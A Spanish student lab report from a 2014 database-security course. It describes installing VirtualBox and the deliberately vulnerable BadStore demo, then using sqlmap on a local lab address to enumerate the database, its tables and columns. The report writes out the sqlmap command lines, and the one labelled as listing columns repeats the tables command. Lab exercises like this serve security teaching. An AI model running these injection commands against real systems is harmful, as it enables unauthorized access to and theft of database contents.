SEGURIDAD EN BASE DE DATOS

PRACTICA 1


Realizada por
Doris E. Jojoa Paz


Escuela de Ciencias Bsicas, Tecnologa e Ingeniera ECBTI,
Universidad Nacional Abierta y a Distancia UNAD
2014
Instalacin de la mquina
virtual Virtual box.
Descarga BadStore.
Descarga de SQLMA (http://sqlmap.org/)
programa para realizar ataque por inyeccin
de cdigo SQL
Ataque a la base de datos de Badstore,
obteniendo informacin sobre la base de
datos(servidor de BD y versin, nombre de
la base de datos, nombre de las tablas, etc.
Oracle VM VirtualBox
es un software de virtualizacin para arquitecturas x86/amd64,
que permite instalar sistemas operativos adicionales,
conocidos como sistemas invitados, dentro de otro sistema
operativo anfitrin, cada uno con su propio ambiente virtual.

Despus de descargarlo de http://www.oracle.com/. Se
procede a su instalacin la cual es muy sencilla. A
continuacin se indican las pantallas ms relevantes de su
instalacin.

1 2
3
4
5
6
Instalacin de virtual vox 4.3.1.6
Una vez instalado virtualbox , tambin se ejecuta un paquete de extensin de
virtualbox para complementar su funcionabilidad
DESCARGA LA BASE DE DATOS DE BADSTORE
Y CONFIGURACIN.
Posteriormente, instalado virtualbox, se procede a su configuracin y carga de la
base de datos de Badstore que se descarg previamente de www.badstore.net ( se
debe dar clic en el apartado que dice descargar demo para acceder a ella). Las
siguientes pantallas indican la secuencia realizada para tal efecto.

1
2
3
4
DESCARGA DE BADSTORE.
5
6
7
8
9
10
Una vez termina la carga y configuracin de Badstore, se procede a iniciar
la mquina virtual, mediante el comando ifconfig, se logra visualizar Ip de
la base de datos registrada 192.168.0.118 , esta direccin se ubica en el
navegador para acceder a Badstore.
ATAQUE POR INYECCIN DE CDIGO SQL UTILIZANDO
SQLMAP
SQLMAP se obtiene de http://sqlmap.org/ , pero para su ejecucin requiere de la
instalacin de Python. Las carpetas que contienen los archivos de SQLMAP como de
Python debe estar en la misma unidad para que funcionen adecuadamente.
ATAQUE A LA BASE DE DATOS DE BADSTORE
Para obtener informacin sobre la base de
datos de Badstore, ingresamos a CMD,
donde se listan sus directorios y a partir de
sqlmap.py se ingresan las lneas
correspondientes para ver informacin de
la base de datos, como versin, tablas
entre otras.

Las siguientes pantallas muestran
informacin de la base datos.

Mediante la siguiente
lnea :
sqlmap.py -u
"http://192.168.0.118/
cgi-
bin/badstore.cgi?searc
hquery=hi&action=sear
ch&x=0&y=0" b

se observa:
Conexin a la base de
datos y la versin
Mediante la lnea:
sqlmap.py -u
"http://192.168.0.1
18/cgi-
bin/badstore.cgi?se
archquery=hi&actio
n=search&x=0&y=0
" --current-db
Se observa el
nombre de la base
de datos

Mediante la lnea:
sqlmap.py -u
"http://192.168.0.1
18/cgi-
bin/badstore.cgi?se
archquery=hi&actio
n=search&x=0&y=0
" --tables -D
badstoredb
Se observan las
tablas de la base de
datos

Mediante la lnea:
sqlmap.py -u
"http://192.168.0.1
18/cgi-
bin/badstore.cgi?se
archquery=hi&actio
n=search&x=0&y=0
" --tables -D
badstoredb
Se observan las
columnas de la base
de datos.
Y asi con diferentes
parametros se
pueden extraer
datos del contenido
de las tablas entre
otros.

Referencias
Tutorial - Manual SQLmap: ataques SQLi - Inyeccin SQL. Recuperado el 27 de
septiembre de 2014 de: http://blog.elhacker.net/2014/06/sqlmap-
automatizando-ataques-sqli-injection.html

http://www.oracle.com/technetwork/es/server-
storage/virtualbox/downloads/index.html#vbox

http://sqlmap.org/

Descargar y usar SQLmap en Windows (Anonymous Cooperacin
Ciberactivista Global).(2/09/2012). Recuperado el 27 de septiembre de 2014
de:
http://www.youtube.com/watch?feature=player_embedded&v=_wwYuilkn8
M